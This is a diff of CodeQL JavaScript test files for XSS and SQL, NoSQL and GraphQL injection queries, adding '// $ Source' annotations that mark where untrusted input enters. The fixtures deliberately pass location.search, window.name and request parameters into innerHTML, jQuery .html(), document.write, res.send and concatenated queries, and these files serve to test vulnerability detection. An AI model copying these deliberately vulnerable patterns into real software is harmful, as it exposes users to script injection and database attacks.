@@ -8,6 +8,6 @@ function foo(x, y, z) {
}
function bar() {
const url = window.location.href;
const url = window.location.href; // $ Source
foo('safe', url, 'safe');
}

4
javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tooltip.jsx
View File

@@ -3,7 +3,7 @@ import ReactDOM from 'react-dom';
import ReactTooltip from 'react-tooltip';
function tooltips() {
const source = window.name;
const source = window.name; // $ Source
return <span>
<span data-tip={source}/>
<span data-tip={source} data-html={false} />
@@ -19,6 +19,6 @@ function MyElement(props) {
}
function useMyElement() {
const source = window.name;
const source = window.name; // $ Source
return <MyElement provide={() => source} />;
}

2
javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/translate.js
View File

@@ -3,7 +3,7 @@
"own goal": "backpass",
"fumble": "feint"
};
var target = document.location.search
var target = document.location.search // $ Source
var searchParams = new URLSearchParams(target.substring(1));
$('original-term').html(searchParams.get('term')); // $ Alert

4
javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types.js
View File

@@ -1,7 +1,7 @@
import * as lib from './trusted-types-lib';
const policy1 = trustedTypes.createPolicy('x', { createHTML: x => x }); // $ Alert
policy1.createHTML(window.name);
policy1.createHTML(window.name); // $ Source
const policy2 = trustedTypes.createPolicy('x', { createHTML: x => 'safe' });
policy2.createHTML(window.name);
@@ -10,4 +10,4 @@ const policy3 = trustedTypes.createPolicy('x', { createHTML: x => x });
policy3.createHTML('safe');
const policy4 = trustedTypes.createPolicy('x', { createHTML: lib.createHtml });
policy4.createHTML(window.name);
policy4.createHTML(window.name); // $ Source

62
javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst.js
View File

@@ -1,5 +1,5 @@
function test() {
var target = document.location.search
var target = document.location.search // $ Source
$('myId').html(target) // $ Alert
@@ -11,7 +11,7 @@ function test() {
$('<div style="width:' + +target + 'px">');
$('<div style="width:' + parseInt(target) + 'px">');
let params = (new URL(document.location)).searchParams;
let params = (new URL(document.location)).searchParams; // $ Source
$('name').html(params.get('name')); // $ Alert
var searchParams = new URLSearchParams(target.substring(1));
@@ -21,10 +21,10 @@ function test() {
function foo(target) {
$('myId').html(target); // $ Alert
}
foo(document.location.search);
foo(document.location.search); // $ Source
function bar() {
return document.location.search;
return document.location.search; // $ Source
}
$('myId').html(bar()); // $ Alert
@@ -50,12 +50,12 @@ $('myId').html(wrap(chop(bar()))); // $ Alert
function dangerouslySetInnerHtml(s) {
$('myId').html(s); // $ Alert
}
dangerouslySetInnerHtml(document.location.search);
dangerouslySetInnerHtml(document.location.search);
dangerouslySetInnerHtml(document.location.search); // $ Source
dangerouslySetInnerHtml(document.location.search); // $ Source
$('myId').html(bar()); // $ Alert
[,document.location.search].forEach(function(x) {
[,document.location.search].forEach(function(x) { // $ Source
if (x)
$('myId').html(x); // $ Alert
});
@@ -90,7 +90,7 @@ angular.module('myApp', [])
})
function tst() {
var v = document.location.search.substr(1);
var v = document.location.search.substr(1); // $ Source
document.write(v); // $ Alert
@@ -129,7 +129,7 @@ function tst() {
function angularJSServices() {
angular.module('myApp', [])
.factory("xssSource_to_service", ["xssSinkService1", function(xssSinkService1) {
xssSinkService1(window.location.search);
xssSinkService1(window.location.search); // $ Source
}])
.factory("xssSinkService1", function(){
return function(v){ $("<div>").html(v); } // $ Alert
@@ -139,7 +139,7 @@ function angularJSServices() {
$("<div>").html(xssSourceService()); // $ Alert
}])
.factory("xssSourceService", function(){
return function() { return window.location.search };
return function() { return window.location.search }; // $ Source
})
.factory("innocentSource_to_service", ["xssSinkService2", function(xssSinkService2) {
@@ -158,14 +158,14 @@ function angularJSServices() {
}
function testDOMParser() {
var target = document.location.search
var target = document.location.search // $ Source
var parser = new DOMParser();
parser.parseFromString(target, "application/xml"); // $ Alert
}
function references() {
var tainted = document.location.search;
var tainted = document.location.search; // $ Source
document.body.innerHTML = tainted; // $ Alert
@@ -178,7 +178,7 @@ function references() {
}
function react(){
var tainted = document.location.search;
var tainted = document.location.search; // $ Source
React.createElement("div", {dangerouslySetInnerHTML: {__html: tainted}}); // $ Alert
React.createFactory("div")({dangerouslySetInnerHTML: {__html: tainted}}); // $ Alert
@@ -266,7 +266,7 @@ function jqueryLocation() {
function testCreateContextualFragment() {
var tainted = window.name;
var tainted = window.name; // $ Source
var range = document.createRange();
range.selectNode(document.getElementsByTagName("div").item(0));
var documentFragment = range.createContextualFragment(tainted); // $ Alert
@@ -282,14 +282,14 @@ function flowThroughPropertyNames() {
function basicExceptions() {
try {
throw location;
throw location; // $ Source
} catch(e) {
$("body").append(e); // $ Alert
}
try {
try {
throw location
throw location // $ Source
} finally {}
} catch(e) {
$("body").append(e); // $ Alert
@@ -308,7 +308,7 @@ function test2() {
}
function getTaintedUrl() {
return new URL(document.location);
return new URL(document.location); // $ Source
}
function URLPseudoProperties() {
@@ -322,21 +322,21 @@ function URLPseudoProperties() {
function hash() {
function getUrl() {
return new URL(document.location);
return new URL(document.location); // $ Source
}
$(getUrl().hash.substring(1)); // $ Alert
}
function growl() {
var target = document.location.search
var target = document.location.search // $ Source
$.jGrowl(target); // $ Alert
}
function thisNodes() {
var pluginName = "myFancyJQueryPlugin";
var myPlugin = function () {
var target = document.location.search
var target = document.location.search // $ Source
this.html(target); // $ Alert - this is a jQuery object
this.innerHTML = target // OK - this is a jQuery object
@@ -352,7 +352,7 @@ function thisNodes() {
}
function test() {
var target = document.location.search
var target = document.location.search // $ Source
$('myId').html(target) // $ Alert
@@ -361,7 +361,7 @@ function test() {
}
function test() {
var target = document.location.search
var target = document.location.search // $ Source
$('myId').html(target); // $ Alert
@@ -371,7 +371,7 @@ function test() {
target.taint2 = 2;
$('myId').html(target.taint2);
target.taint3 = document.location.search;
target.taint3 = document.location.search; // $ Source
$('myId').html(target.taint3); // $ Alert
target.sub.taint4 = 2
@@ -396,10 +396,10 @@ function test() {
}
function hash2() {
var payload = window.location.hash.substr(1);
var payload = window.location.hash.substr(1); // $ Source
document.write(payload); // $ Alert
let match = window.location.hash.match(/hello (\w+)/);
let match = window.location.hash.match(/hello (\w+)/); // $ Source
if (match) {
document.write(match[1]); // $ Alert
}
@@ -408,7 +408,7 @@ function hash2() {
}
function nonGlobalSanitizer() {
var target = document.location.search
var target = document.location.search // $ Source
$("#foo").html(target.replace(/<metadata>[\s\S]*<\/metadata>/, '<metadata></metadata>')); // $ Alert
@@ -416,7 +416,7 @@ function nonGlobalSanitizer() {
}
function mootools(){
var source = document.location.search;
var source = document.location.search; // $ Source
new Element("div");
new Element("div", {text: source});
@@ -433,14 +433,14 @@ const Convert = require('ansi-to-html');
const ansiToHtml = new Convert();
function ansiToHTML() {
var source = document.location.search;
var source = document.location.search; // $ Source
$("#foo").html(source); // $ Alert
$("#foo").html(ansiToHtml.toHtml(source)); // $ Alert
}
function domMethods() {
var source = document.location.search;
var source = document.location.search; // $ Source
let table = document.getElementById('mytable');
table.innerHTML = source; // $ Alert
@@ -451,7 +451,7 @@ function domMethods() {
}
function urlStuff() {
var url = document.location.search.substr(1);
var url = document.location.search.substr(1); // $ Source
$("<a>", {href: url}).appendTo("body"); // $ Alert
$("#foo").attr("href", url); // $ Alert
@@ -488,7 +488,7 @@ function Foo() {
}
function nonGlobalSanitizer() {
var target = document.location.search
var target = document.location.search // $ Source
$("#foo").html(target.replace(new RegExp("<|>"), '')); // $ Alert
$("#foo").html(target.replace(new RegExp("<|>", unknownFlags()), '')); // OK - most likely good. We don't know what the flags are.
$("#foo").html(target.replace(new RegExp("<|>", "g"), ''));

2
javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst3.js
View File

@@ -1,5 +1,5 @@
var foo = document.getElementById("foo");
var data = JSON.parse(decodeURIComponent(window.location.search.substr(1)));
var data = JSON.parse(decodeURIComponent(window.location.search.substr(1))); // $ Source
foo.setAttribute("src", data.src); // $ Alert
foo.setAttribute("HREF", data.p); // $ Alert

2
javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/typeahead.js
View File

@@ -17,7 +17,7 @@
{
name: 'dashboards',
source: function (query, cb) {
var target = document.location.search
var target = document.location.search // $ Source
cb(target);
},
templates: {

2
javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/various-concat-obfuscations.js
View File

@@ -1,5 +1,5 @@
function test() {
let tainted = document.location.search;
let tainted = document.location.search; // $ Source
$("<div>" + tainted + "</div>"); // $ Alert
$(`<div>${tainted}</div>`); // $ Alert

2
javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/winjs.js
View File

@@ -1,5 +1,5 @@
function test(elt) {
var tainted = document.location.search.substring(1);
var tainted = document.location.search.substring(1); // $ Source
WinJS.Utilities.setInnerHTMLUnsafe(elt, tainted); // $ Alert
WinJS.Utilities.setOuterHTMLUnsafe(elt, tainted); // $ Alert
}

12
javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/exception-xss.js
View File

@@ -1,5 +1,5 @@
(function () {
var foo = document.location;
var foo = document.location; // $ Source
function inner(x) {
unknown(x);
@@ -114,7 +114,7 @@ var app = express();
app.get('/user/:id', function (req, res) {
try {
unknown(req.params.id);
unknown(req.params.id); // $ Source
} catch (e) {
res.send("Exception: " + e); // $ Alert
}
@@ -122,7 +122,7 @@ app.get('/user/:id', function (req, res) {
(function () {
sessionStorage.setItem('exceptionSession', document.location.search);
sessionStorage.setItem('exceptionSession', document.location.search); // $ Source
try {
unknown(sessionStorage.getItem('exceptionSession'));
@@ -133,7 +133,7 @@ app.get('/user/:id', function (req, res) {
app.get('/user/:id', function (req, res) {
unknown(req.params.id, (error, res) => {
unknown(req.params.id, (error, res) => { // $ Source
if (error) {
$('myId').html(error); // $ Alert
return;
@@ -143,7 +143,7 @@ app.get('/user/:id', function (req, res) {
});
(function () {
var foo = document.location.search;
var foo = document.location.search; // $ Source
new Promise(resolve => unknown(foo, resolve)).catch((e) => {
$('myId').html(e); // $ Alert
@@ -177,7 +177,7 @@ app.get('/user/:id', function (req, res) {
})();
app.get('/user/:id', function (req, res) {
unknown(req.params.id, (error, res) => {
unknown(req.params.id, (error, res) => { // $ Source
if (error) {
$('myId').html(error); // $ Alert
}

8
javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js
View File

@@ -60,7 +60,7 @@ app.get('/user/:id', function (req, res) {
.use(doc, { title: '👋🌍' })
.use(format)
.use(html)
.process(req.body, function (err, file) {
.process(req.body, function (err, file) { // $ Source
res.send(file); // $ Alert
});
@@ -70,7 +70,7 @@ app.get('/user/:id', function (req, res) {
res.send(unified().use(markdown).processSync(req.body).toString); // $ Alert
remark().process(req.body, (e, f) => {
remark().process(req.body, (e, f) => { // $ Source
res.send(f); // $ Alert
})
});
@@ -110,9 +110,9 @@ hapi.route({
}});
app.get("invalid/keys/:id", async (req, res) => {
const { keys: queryKeys } = req.query;
const { keys: queryKeys } = req.query; // $ Source
const paramKeys = req.params;
const keys = queryKeys || paramKeys?.keys;
const keys = queryKeys || paramKeys?.keys; // $ Source
const keyArray = typeof keys === 'string' ? [keys] : keys;
const invalidKeys = keyArray.filter(key => !whitelist.includes(key));

2
javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood3.js
View File

@@ -132,7 +132,7 @@ function escapeHtml4(s) {
}
app.get('/user/:id', function (req, res) {
const url = req.params.id;
const url = req.params.id; // $ Source
res.send(escapeHtml1(url));
res.send(escapeHtml2(url));

2
javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/etherpad.js
View File

@@ -6,7 +6,7 @@ app.get("/some/path", (req, res) => {
let response = "Hello, world!";
if(req.query.jsonp && isVarName(req.query.jsonp))
response = req.query.jsonp + "(" + response + ")";
response = req.query.jsonp + "(" + response + ")"; // $ Source
res.send(response); // $ Alert
});

2
javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/formatting.js
View File

@@ -1,7 +1,7 @@
var express = require('express');
express().get('/user/', function(req, res) {
var evil = req.query.evil;
var evil = req.query.evil; // $ Source
res.send(console.log("<div>%s</div>", evil)); // OK - returns undefined
res.send(util.format("<div>%s</div>", evil)); // $ Alert
res.send(require("printf")("<div>%s</div>", evil)); // $ Alert

4
javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/live-server.js
View File

@@ -1,13 +1,13 @@
var liveServer = require("live-server");
const middleware = [function(req, res, next) {
const tainted = req.url;
const tainted = req.url; // $ Source
res.end(`<html><body>${tainted}</body></html>`); // $ Alert
}];
middleware.push(function(req, res, next) {
const tainted = req.url;
const tainted = req.url; // $ Source
res.end(`<html><body>${tainted}</body></html>`); // $ Alert
});

8
javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/partial.js
View File

@@ -10,7 +10,7 @@ app.get("/some/path", (req, res) => {
res.send(x + y); // $ Alert
}
let callback = sendResponse.bind(null, req.url);
let callback = sendResponse.bind(null, req.url); // $ Source
[1, 2, 3].forEach(callback);
});
@@ -19,7 +19,7 @@ app.get("/underscore", (req, res) => {
res.send(x + y); // $ Alert
}
let callback = underscore.partial(sendResponse, req.url);
let callback = underscore.partial(sendResponse, req.url); // $ Source
[1, 2, 3].forEach(callback);
});
@@ -28,7 +28,7 @@ app.get("/lodash", (req, res) => {
res.send(x + y); // $ Alert
}
let callback = lodash.partial(sendResponse, req.url);
let callback = lodash.partial(sendResponse, req.url); // $ Source
[1, 2, 3].forEach(callback);
});
@@ -37,7 +37,7 @@ app.get("/ramda", (req, res) => {
res.send(x + y); // $ Alert
}
let callback = R.partial(sendResponse, [req.url]);
let callback = R.partial(sendResponse, [req.url]); // $ Source
[1, 2, 3].forEach(callback);
});

2
javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/promises.js
View File

@@ -2,7 +2,7 @@ let express = require('express');
let app = express();
app.get("/some/path", (req, res) => {
new Promise((resolve, reject) => resolve(req.query.data))
new Promise((resolve, reject) => resolve(req.query.data)) // $ Source
.then(x => res.send(x)); // $ Alert
new Promise((resolve, reject) => resolve(req.query.data))

14
javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst2.js
View File

@@ -3,7 +3,7 @@ var express = require('express');
var app = express();
app.get('/user/:id', function(req, res) {
let { p, q: r } = req.params;
let { p, q: r } = req.params; // $ Source
res.send(p); // $ Alert
res.send(r); // $ Alert
});
@@ -11,7 +11,7 @@ app.get('/user/:id', function(req, res) {
const aKnownValue = "foo";
app.get('/bar', function(req, res) {
let { p } = req.params;
let { p } = req.params; // $ Source
if (p == aKnownValue)
res.send(p);
@@ -27,7 +27,7 @@ app.get('/bar', function(req, res) {
const clone = require('clone');
app.get('/baz', function(req, res) {
let { p } = req.params;
let { p } = req.params; // $ Source
var obj = {};
obj.p = p;
@@ -40,7 +40,7 @@ app.get('/baz', function(req, res) {
const serializeJavaScript = require('serialize-javascript');
app.get('/baz', function(req, res) {
let { p } = req.params;
let { p } = req.params; // $ Source
var serialized = serializeJavaScript(p);
@@ -54,7 +54,7 @@ app.get('/baz', function(req, res) {
const fclone = require('fclone');
app.get('/baz', function(req, res) {
let { p } = req.params;
let { p } = req.params; // $ Source
var obj = {};
obj.p = p;
@@ -66,7 +66,7 @@ app.get('/baz', function(req, res) {
const jc = require('json-cycle');
app.get('/baz', function(req, res) {
let { p } = req.params;
let { p } = req.params; // $ Source
var obj = {};
obj.p = p;
@@ -79,7 +79,7 @@ app.get('/baz', function(req, res) {
const sortKeys = require('sort-keys');
app.get('/baz', function(req, res) {
let { p } = req.params;
let { p } = req.params; // $ Source
var obj = {};
obj.p = p;

4
javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst3.js
View File

@@ -2,12 +2,12 @@ var express = require('express');
var app = express();
app.enable('x-powered-by').disable('x-powered-by').get('/', function (req, res) {
let { p } = req.params;
let { p } = req.params; // $ Source
res.send(p); // $ Alert
});
const prettier = require("prettier");
app.post("foobar", function (reg, res) {
const code = prettier.format(reg.body, { semi: false, parser: "babel" });
const code = prettier.format(reg.body, { semi: false, parser: "babel" }); // $ Source
res.send(code); // $ Alert
});

4
javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-filenames.js
View File

@@ -4,7 +4,7 @@ var fs = require('fs');
var express = require('express');
express().get('/', function(req, res) {
fs.readdir("/myDir", function (error, files1) {
fs.readdir("/myDir", function (error, files1) { // $ Source
res.send(files1); // $ Alert
});
});
@@ -22,7 +22,7 @@ http.createServer(function (req, res) {
return files3.join('');
}
fs.readdir("/myDir", function (error, files1) {
fs.readdir("/myDir", function (error, files1) { // $ Source
res.write(files1); // $ Alert
var dirs = [];

2
javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-torrent.js
View File

@@ -3,6 +3,6 @@ const parseTorrent = require('parse-torrent'),
express().get('/user/:id', function(req, res) {
let torrent = parseTorrent(unknown),
name = torrent.name;
name = torrent.name; // $ Source
res.send(name); // $ Alert
});

2
javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/jquery-plugin.js vendored
View File

@@ -8,7 +8,7 @@
$("<span>" + $.trim("foo") + "</span>");
}));
$.fn.myPlugin = function (stuff, options) {
$.fn.myPlugin = function (stuff, options) { // $ Source
$("#foo").html("<span>" + options.foo + "</span>"); // $ Alert
$("#foo").html("<span>" + stuff + "</span>"); // $ Alert

2
javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib/src/MyNode.ts
View File

@@ -1,4 +1,4 @@
export function trivialXss(s: string) {
export function trivialXss(s: string) { // $ Source
const html = "<span>" + s + "</span>"; // $ Alert
document.querySelector("#html").innerHTML = html;
}

4
javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/index.ts
View File

@@ -1,9 +1,9 @@
export function trivialXss(s: string) {
export function trivialXss(s: string) { // $ Source
const html = "<span>" + s + "</span>"; // $ Alert - this file is recognized as a main file.
document.querySelector("#html").innerHTML = html;
}
export function objectStuff(settings: any, i: number) {
export function objectStuff(settings: any, i: number) { // $ Source
document.querySelector("#html").innerHTML = "<span>" + settings + "</span>"; // $ Alert
var name;

2
javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/src/MyNode.ts
View File

@@ -1,4 +1,4 @@
export function trivialXss(s: string) {
export function trivialXss(s: string) { // $ Source
const html = "<span>" + s + "</span>"; // $ Alert - this file is not recognized as a main file.
document.querySelector("#html").innerHTML = html;
}

20
javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js
View File

@@ -1,14 +1,14 @@
module.exports.xssThroughHTMLConstruction = function (s) {
module.exports.xssThroughHTMLConstruction = function (s) { // $ Source
const html = "<span>" + s + "</span>";// $ Alert
document.querySelector("#html").innerHTML = html;
}
module.exports.xssThroughXMLParsing = function (s) {
module.exports.xssThroughXMLParsing = function (s) { // $ Source
const doc = new DOMParser().parseFromString(s, "text/xml"); // $ Alert
document.querySelector("#xml").appendChild(doc.documentElement);
}
module.exports.xssThroughMoreComplexXMLParsing = function (s) {
module.exports.xssThroughMoreComplexXMLParsing = function (s) { // $ Source
const doc = new DOMParser().parseFromString(s, "text/xml"); // $ Alert
const xml = doc.documentElement;
@@ -18,7 +18,7 @@ module.exports.xssThroughMoreComplexXMLParsing = function (s) {
}
const markdown = require('markdown-it')({html: true});
module.exports.xssThroughMarkdown = function (s) {
module.exports.xssThroughMarkdown = function (s) { // $ Source
const html = markdown.render(s); // $ Alert
document.querySelector("#markdown").innerHTML = html;
}
@@ -53,7 +53,7 @@ module.exports.createsClass = function (s) {
return new Foo(s);
}
$.fn.xssPlugin = function (options) {
$.fn.xssPlugin = function (options) { // $ Source
const defaults = {
name: "name"
};
@@ -63,7 +63,7 @@ $.fn.xssPlugin = function (options) {
});
}
module.exports.guards = function (attrVal) {
module.exports.guards = function (attrVal) { // $ Source
document.querySelector("#id").innerHTML = "<img alt=\"" + attrVal + "\"/>"; // $ Alert
document.querySelector("#id").innerHTML = "<img alt=\"" + attrVal.replace(/"|'/g, "") + "\"/>";
if (attrVal.indexOf("\"") === -1 && attrVal.indexOf("'") === -1) {
@@ -76,7 +76,7 @@ module.exports.intentionalTemplate = function (obj) {
document.querySelector("#template").innerHTML = html;
}
module.exports.types = function (val) {
module.exports.types = function (val) { // $ Source
if (typeof val === "string") {
$("#foo").html("<span>" + val + "</span>"); // $ Alert
} else if (typeof val === "number") {
@@ -90,12 +90,12 @@ function createHTML(x) {
return "<span>" + x + "</span>"; // $ Alert
}
module.exports.usesCreateHTML = function (x) {
module.exports.usesCreateHTML = function (x) { // $ Source
$("#foo").html(createHTML(x));
}
const myMermaid = require('mermaid');
module.exports.usesCreateHTML = function (x) {
module.exports.usesCreateHTML = function (x) { // $ Source
myMermaid.render("id", x, function (svg) { // $ Alert
$("#foo").html(svg);
});
@@ -113,7 +113,7 @@ module.exports.usesCreateHTML = function (x) {
});
}
module.exports.xssThroughMarkdown = function (s) {
module.exports.xssThroughMarkdown = function (s) { // $ Source
const html = markdown.render(s); // $ Alert
document.querySelector("#markdown").innerHTML = html;
}

4
javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/typed.ts
View File

@@ -1,9 +1,9 @@
export function basicHtmlConstruction(s: string) {
export function basicHtmlConstruction(s: string) { // $ Source
const html = "<span>" + s + "</span>"; // $ Alert
document.body.innerHTML = html;
}
export function insertIntoCreatedDocument(s: string) {
export function insertIntoCreatedDocument(s: string) { // $ Source
const newDoc = document.implementation.createHTMLDocument("");
newDoc.body.innerHTML = "<span>" + s + "</span>"; // $ SPURIOUS: Alert - inserted into document disconnected from the main DOM.
}

30
javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/unsafe-jquery-plugin.js
View File

@@ -1,5 +1,5 @@
(function(){
$.fn.my_plugin = function my_plugin(options) {
$.fn.my_plugin = function my_plugin(options) { // $ Source
$(options); // $ Alert - or is it?
$(options.target); // $ Alert
@@ -62,18 +62,18 @@
};
$.fn.my_plugin = function my_plugin(element, options) {
$.fn.my_plugin = function my_plugin(element, options) { // $ Source
this.$element = $(element);
this.options = $.extend({}, options);
if (this.options.parent) this.$parent = $(this.options.parent) // $ Alert
};
$.fn.my_plugin = function my_plugin(options) {
$.fn.my_plugin = function my_plugin(options) { // $ Source
$(options.foo.bar.baz); // $ Alert
$(options.html);
};
$.fn.my_plugin = function my_plugin(options) {
$.fn.my_plugin = function my_plugin(options) { // $ Source
$(x).appendTo(options.foo.bar.baz); // $ Alert
};
@@ -81,7 +81,7 @@
$("#" + options.target);
};
$.fn.my_plugin = function my_plugin(options) {
$.fn.my_plugin = function my_plugin(options) { // $ Source
function f(o) {
this.o = $.extend({}, o);
var t = this.o.target;
@@ -98,7 +98,7 @@
$(target);
};
$.fn.my_plugin = function my_plugin(options) {
$.fn.my_plugin = function my_plugin(options) { // $ Source
options = $.extend({
menu: '<div></div>',
target: '.my_plugin'
@@ -111,28 +111,28 @@
menu: '<div></div>',
target: '.my_plugin'
};
$.fn.my_plugin = function my_plugin(options) {
$.fn.my_plugin = function my_plugin(options) { // $ Source
options = $.extend({}, $.fn.my_plugin.defaults, options);
$(options.menu);
$(options.target); // $ Alert
};
var pluginName = "my_plugin";
$.fn[pluginName] = function my_plugin(options) {
$.fn[pluginName] = function my_plugin(options) { // $ Source
$(options.target); // $ Alert
};
$.extend($.fn, {
my_plugin: function my_plugin(options) {
my_plugin: function my_plugin(options) { // $ Source
$(options.target); // $ Alert
}
});
$.fn.affix = function my_plugin(options) {
$.fn.affix = function my_plugin(options) { // $ Source
$(options.target); // $ Alert
};
$.fn.tooltip = function my_plugin(options) {
$.fn.tooltip = function my_plugin(options) { // $ Source
$(options.viewport.selector); // $ Alert
};
@@ -150,14 +150,14 @@
$(unintentional); // OK - but should be flagged by another query
}
$.fn.my_plugin = function my_plugin(options) {
$.fn.my_plugin = function my_plugin(options) { // $ Source
let target = options.target;
target === DEFAULTS.target? $(target): $(document).find(target);
options.target === DEFAULTS.target? $(options.target): $(document).find(options.target);
options.targets.a === DEFAULTS.target? $(options.target.a): $(document).find(options.target.a); // $ SPURIOUS: Alert - should be sanitized by `MembershipTestSanitizer` - but still flagged because `AccessPath` can't handle these deeply nested properties
}
$.fn.my_plugin = function my_plugin(options) {
$.fn.my_plugin = function my_plugin(options) { // $ Source
$(anyPrefix + options.target); // OK - unlikely to be a html/css prefix confusion
$(something.replace("%PLACEHOLDER%", options.target)); // OK - (unlikely to be a html/css prefix confusion);
@@ -175,14 +175,14 @@
function setupPlugin(o) {
$.fn.my_plugin = o.f
}
setupPlugin({f: function(options) {
setupPlugin({f: function(options) { // $ Source
$(options.target); // $ Alert
}});
setupPlugin({f:function(options) {
$(document).find(options.target);
}});
$.fn.position = function( options ) {
$.fn.position = function( options ) { // $ Source
if ( !options || !options.of ) {
return doSomethingElse( this, arguments );
}

2
javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/angular.ts
View File

@@ -9,7 +9,7 @@ import { NgForm } from "@angular/forms";
`
})
export class Foo {
field: string = "";
field: string = ""; // $ Source
safeField: string = "";
setInput1(event) {

16
javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/forms.js
View File

@@ -5,10 +5,10 @@ const FormikBasic = () => (
<div>
<Formik
initialValues={{ email: '', password: '' }}
validate={values => {
validate={values => { // $ Source
$("#id").html(values.foo); // $ Alert
}}
onSubmit={(values, { setSubmitting }) => {
onSubmit={(values, { setSubmitting }) => { // $ Source
$("#id").html(values.bar); // $ Alert
}}
>
@@ -21,17 +21,17 @@ const FormikBasic = () => (
const FormikEnhanced = withFormik({
mapPropsToValues: () => ({ name: '' }),
validate: values => {
validate: values => { // $ Source
$("#id").html(values.email); // $ Alert
},
handleSubmit: (values, { setSubmitting }) => {
handleSubmit: (values, { setSubmitting }) => { // $ Source
$("#id").html(values.email); // $ Alert
}
})(MyForm);
(function () {
const { values, submitForm } = useFormikContext();
const { values, submitForm } = useFormikContext(); // $ Source
$("#id").html(values.email); // $ Alert
$("#id").html(submitForm.email);
@@ -41,7 +41,7 @@ import { Form } from 'react-final-form'
const App = () => (
<Form
onSubmit={async values => {
onSubmit={async values => { // $ Source
$("#id").html(values.stooge); // $ Alert
}}
initialValues={{ stooge: 'larry', employed: false }}
@@ -68,7 +68,7 @@ import { useForm } from 'react-hook-form';
function HookForm() {
const { register, handleSubmit, errors } = useForm(); // initialize the hook
const onSubmit = (data) => {
const onSubmit = (data) => { // $ Source
$("#id").html(data.name); // $ Alert
};
@@ -89,7 +89,7 @@ function HookForm2() {
<button
type="button"
onClick={() => {
const values = getValues(); // { test: "test-input", test1: "test1-input" }
const values = getValues(); // $ Source - { test: "test-input", test1: "test1-input" }
$("#id").html(values.name); // $ Alert
}}
>

12
javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/xss-through-dom.js
View File

@@ -70,7 +70,7 @@
$.jGrowl($("input").get(0).name); // $ Alert
let selector = $("input").get(0).name;
let selector = $("input").get(0).name; // $ Source
if (something()) {
selector = $("textarea").val || ''
}
@@ -81,7 +81,7 @@
$("#id").html( $('#foo').prop('innerText') ); // $ Alert
const anser = require("anser");
const text = $("text").text();
const text = $("text").text(); // $ Source
$("#id").html(anser.ansiToHtml(text)); // $ Alert
$("#id").html(new anser().process(text)); // $ Alert
@@ -111,7 +111,7 @@ class Sub extends Super {
}
(function () {
const src = document.getElementById("#link").src;
const src = document.getElementById("#link").src; // $ Source
$("#id").html(src); // $ Alert
$("#id").attr("src", src);
@@ -127,7 +127,7 @@ class Sub extends Super {
let elem = document.createElement('a');
const wSelection = getSelection();
const dSelection = document.getSelection();
let linkText = wSelection.toString() || dSelection.toString() || '';
let linkText = wSelection.toString() || dSelection.toString() || ''; // $ Source
elem.innerHTML = linkText; // $ Alert
$("#id").html(linkText); // $ Alert
elem.innerText = linkText;
@@ -136,7 +136,7 @@ class Sub extends Super {
const cashDom = require("cash-dom");
(function () {
const src = document.getElementById("#link").src;
const src = document.getElementById("#link").src; // $ Source
cash("#id").html(src); // $ Alert
cashDom("#id").html(src); // $ Alert
@@ -156,7 +156,7 @@ const cashDom = require("cash-dom");
},
};
VeryUniqueXssTestName.send($("textarea").val());
VeryUniqueXssTestName.send($("textarea").val()); // $ Source
}
foo()
})();

2
javascript/ql/test/query-tests/Security/CWE-089/local-threat-source/test.js
View File

@@ -1,7 +1,7 @@
const mysql = require('mysql');
const pool = mysql.createPool(getConfig());
let temp = process.env['foo'];
let temp = process.env['foo']; // $ Source
pool.getConnection(function(err, connection) {
connection.query({
sql: 'SELECT * FROM `books` WHERE `author` = ' + temp, // $ Alert

4
javascript/ql/test/query-tests/Security/CWE-089/typed/typedClient.ts
View File

@@ -10,7 +10,7 @@ let app = express();
app.use(bodyParser.json());
app.post("/find", (req, res) => {
let v = JSON.parse(req.body.x);
let v = JSON.parse(req.body.x); // $ Source
getCollection().find({ id: v }); // $ Alert
});
@@ -18,7 +18,7 @@ import * as mongoose from "mongoose";
declare function getMongooseModel(): mongoose.Model;
declare function getMongooseQuery(): mongoose.Query;
app.post("/find", (req, res) => {
let v = JSON.parse(req.body.x);
let v = JSON.parse(req.body.x); // $ Source
getMongooseModel().find({ id: v }); // $ Alert
getMongooseQuery().find({ id: v }); // $ Alert
});

12
javascript/ql/test/query-tests/Security/CWE-089/untyped/graphql.js
View File

@@ -5,7 +5,7 @@ import { Octokit } from "@octokit/core";
const kit = new Octokit();
app.get('/post/:id', function(req, res) {
const id = req.params.id;
const id = req.params.id; // $ Source
const response = kit.graphql(`
query {
repository(owner: "github", name: "${id}") {
@@ -22,7 +22,7 @@ app.get('/post/:id', function(req, res) {
import { graphql, withCustomRequest } from "@octokit/graphql";
app.get('/user/:id/', function(req, res) {
const id = req.params.id;
const id = req.params.id; // $ Source
const response = graphql(`foo ${id}`); // $ Alert
const myGraphql = withCustomRequest(request);
